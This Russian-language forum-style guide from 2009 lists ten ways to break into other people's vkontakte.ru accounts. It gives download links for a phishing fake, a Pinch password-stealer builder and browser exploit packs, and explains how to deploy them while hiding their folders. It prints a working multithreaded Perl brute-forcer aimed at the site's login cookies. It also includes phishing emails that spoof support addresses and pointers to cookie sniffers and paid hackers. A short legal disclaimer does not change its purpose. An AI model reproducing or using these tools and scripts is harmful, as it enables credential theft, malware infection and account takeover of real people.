Главная
страница 1
10 способов взлома анкеты vkontakte.ru

------------------------------------------------------------------------------------------------------------

Что нам потребуется:

Умение настраивать пинч(если это у вас уже получилось, то остальные 2 требования можно не смотреть)

Прямые руки

Хоть капелька мозга

1) Через мыло, если мы его знаем то уже все проще, ведь имеется как минимум 15 методов взлома почты...НО есть и еще один минус, если пароль "корявый", он

разумеется надежный, но с его восстановлением проблемы, когда такой высылают на почту, то он принимает "левый" вид, и соответственно не работает. не в этом

суть, поэтому останавливаться не будем

2) Фейк, достаточно простой способ, кидаем ссылку жертве любым способом(ася, через лс и тд) скачать его можно по ссылке http://slil.ru/25774471

3) Троян. Эту категорию мы разделим на другие.

а) Скинуть "чистый" файл, либо ссылку на загрузку его, но тут еще надо чтобы пользователь его запустил. http://slil.ru/25774480 - здесь лежит билдер пинча, а

здесь парсер http://slil.ru/25774491 , если вы захотите чтобы отчеты шли на гейт - вот подходящий от Генома - http://slil.ru/25774495

б) кейлогер - менее полезный, но если жертва его "словит" и вы покопаетесь(причем оочень долго) с отчетом, то пароль получите 100%

в) Сплоит, тут ничего сложного нету, НО ЕСТЬ МИНУС! Паблик сплоиты пробивают в основном ие6 и то, примерно, 6/10(имхо)

Советую армитаж(айс пак тоже в теме). Прост в настройке, нужно только создать базу мускуль(делается в пару кликов), и отредактировать файлы(db.php config.php), после того как зальете на хост, выставляем нужные права, на папку load - 777. config.php - 777


Скачать 3 связки можно по ссылке http://slil.ru/25776403 - здесь лежат мпак, айспак и армитаж

ЗЫ когда будете настраивать пинч, устанавите права на гейт 775, на папку в которую будут идти отчеты - 777, и не забывайте что не надо называть папку с отчетами OtchetyOTpincha, имхо палевно, лучше назовите 404 или еще как, ну что бы внимания не привлекало...Папку в которой будет лежать сплоит, тоже

переиминуйте на что-нить типа myphotos и тд... тк люди будут эту ссылку себе в браузер пихать, не нужно что бы там было написанно EXPLOIT...лишнее палево ни к чему...

Идем дальше...

Надеюсь, пинч уже настроен на гейт или почту, желательно что бы он еще и закриптованный был.

Заходим по ссылке на файл install.php нашего сплоита, а потом идем в админку, устанавливаем настройки, выбераем файл который будет грузится жертве, теперь он

будет лежать в папке load под именем file.

Кидаем ссылку жертве, и ждем с надеждой что ее пробьет и отчет с паролем нам придет.

4)Брутфорс, как всем известно - перебор паролей. Способ долгий, и не всегда сработает(в случае пароля D5&%-AefV)

Для этого брутфорсера нам потребуется активперл скачать мона тут http://download.softportal.com/softw...ctiveperl.html либо по ссылке

http://www.denwer.ru/packages/perl.html

Код:


#!/usr/bin/perl

use IO::Socket;

use MD5;

use threads;

use threads::shared;

my @pass : shared;

open (pass, "<$dic");

Next:


@pass = pass();

for(0..$threads) {$trl[$_] = threads->create(&Brut, $_);}

for(@trl) { $_->join; }

sub Brut

{

while (@pass){



$pass = shift @pass;

$md5 = MD5->hexhash($pass);

$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80);

print $sock "HEAD http://vkontakte.ru/ HTTP/1.0rn".

"Host: vkontakte.rurn".

"Accept: */*rn".

"Content-Type: application/x-www-form-urlencodedrn".

"User-Agent: Mozillorn".

"C*****: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5rn".

"Connection: closernrn";

$answ = <$sock>;

close $sock;

print "$pass $answ";

if ($answ =~ /302/){

open (good, '>>good.txt');

print good "$id:$pass:$md5n";

print "$id:$pass:$md5n";

close good;

exit;}

}

}



goto Next;

sub pass

{

my (@mas);



while (
{

push @mas, $_;

last if (@mas == 400);

}

chomp @mas;



return @mas;

}

Не забудьте сменить разширение на brut.pl



$dic = ‘passl.txt’; #паслист для брдутфорсера

$id = 1; #айдишник цели(его можно взять из адресной строки когда вы зашли на страницу жертвы)

$mail = ‘мыло’; #мыло, значек @ меняем на %40

$threads = Х; # где Х - количество потоков

Если вам лень копаться со всем этим, то есть неплохой брут на С. Скачать его можно по ссылке http://slil.ru/25774498, сразу говорю, если не запускается - это

ваши проблемы, ибо все прекрасно работает!

5)Имхо самый надежный способ, открываем исходник нашего фейка, закидываем в него наш код ******...

Теперь, когда жертва перейдет на нашу ссылку, мы увеличиваем вероятность того, что юзера пробьет, либо через браузер, либо через тупость, тк теперь у нас на

ссылке комбинированная атака на мозг(фейк) и браузер(код ******).

6)Способ приводится много где, здесь нужно поискать сайты на которых сидит жертва(форумы, почта и пр) и попытаться похекать что-то из вышеперечисленного,

авось найдем старый заброшенный пароль, а он подойдет.

7) как обычно СИ, пробуем отправить письмо от адресата durov@vkontakte.ru или support@vkontakte.ru с текстом типа, ваша страница на сайте vkontakte.ru будет

заблокированна через N дней, если вы не подтвердите какую-нить хрень, методом отправки нам пароля.

Или, можно прислать письмо типа, вам пришло личное сообщение/открытка и пр, от такого-то пользователя, что бы ее прочитать перейдите по ссылке, а ссылка

будет вести на наш фейк.

Что-бы отправить письмо с "левого" адреса, нужен какой-нить майлер, например, этот http://softnic.ru/soft/programm_4223.html, либо любой подходящий для вас

из гугла.

Только не забудьте зарегить себе не привлекающее мыло, похожее на суппортское, и вписать его в поле копия.(что бы пароли пришли именно вам на почту)

8) Снифер, тут лучше отправлять его на почту(если мы знаем мыло), тогда мы без лишних проблем сможем перехватить сессию, и с помощью системы восстановления пароля на сайте вконтакте получить письмо с паролем.

http://forum.antichat.ru/showthread.php?p=457280

Есть сниферы и получше, но они платные, все же тема распространена и в гуле можно ввсести запрос на пхп снифер и найти много полезной инфы.

9)ХSS, паблик дырок на этом сайте нету, так что кража кукисов маловероятна, хотя если ооочень долго подождать, то можно и дождаться паблик уязвимости - но

такой подход к делу бредовый, поэтому останавливаться на нем не будем.

10) Самый простой способ, единственное что от вас требуется - уметь работать с платежными системами и иметь деньги. Просто закажите взлом если вам не помог

ни один из 9 пунктов, может найдется умелец который сломает неприступную жертву. Поискать такогого можно здесь - http://www.hackzone.ru/forum/list/fid/23/ или здесь http://www.hackzone.ru/forum/list/fid/4/

Перед тем как задать вопрос воспользуйтесь полезными ссылками:

google.ru

http://www.poiskinfo.net/stat/st1.php

http://segfault.kiev.ua/smart-questions-ru.html

http://penguin.kurgan.ru/doc/Perl/perlfaq1.htm

Ну и на последок - googleforidiots.com

На этом все, надеюсь вам не особо скучно было при чтении всего этого.


(c) by [-E-N-E-R-G-Y-] 2009 
Быстрее фейком! высылаешь письмо от имени admin@vkontakte.ru, где написано "Здравствуйте, Вам пришло сообщение, чтобы прочитать его, перейдите по ссылке http://vkontakte.ru/id544685(только вот ссылка на самом деле будет вести на фейк).

Помните!!! Незаконного вторжение в личную информацию конфиденциального характера преследуется законом Украины «Про информацию» и за нарушение на Вас ставят к административной ответственности.


Смотрите также:
10 способов взлома анкеты vkontakte ru
44.22kb.
1 стр.
Информация для анкеты в Посольство Канады Вопросы основной анкеты
157.3kb.
1 стр.
Инструкция по заполнению анкеты посольства США (форма ds-156) на получение неиммиграционной визы в США
76.41kb.
1 стр.
Это ключевой момент взлома системы unix. Допустим, вы опасаетесь заниматься хакингом под собственным id
160.05kb.
1 стр.
Вирусы и антивирусы. Технологии взлома
12.27kb.
1 стр.
Патенты, товарные знаки vkontakte ru/club15304128 Инновационная сага В. Коновалов
1665.43kb.
7 стр.
Энергосбережение в жкх: 96 способов
82.02kb.
1 стр.
Опросник для заполнения анкеты по категории студент (до 6 месяцев) Опросник для заполнения анкеты по категории турист часть 1 личные данные
274.88kb.
1 стр.
Анализ способов защиты приложений…
78.18kb.
1 стр.
Лоуренс Блок Восемь миллионов способов умереть Мэттью Скаддер – 05
4821.93kb.
25 стр.
Физико-технологические основы новых способов термической обработки высокопрочного чугуна
72.61kb.
1 стр.
Технология анализа машинного кода и способы защиты от взлома программ
267.12kb.
1 стр.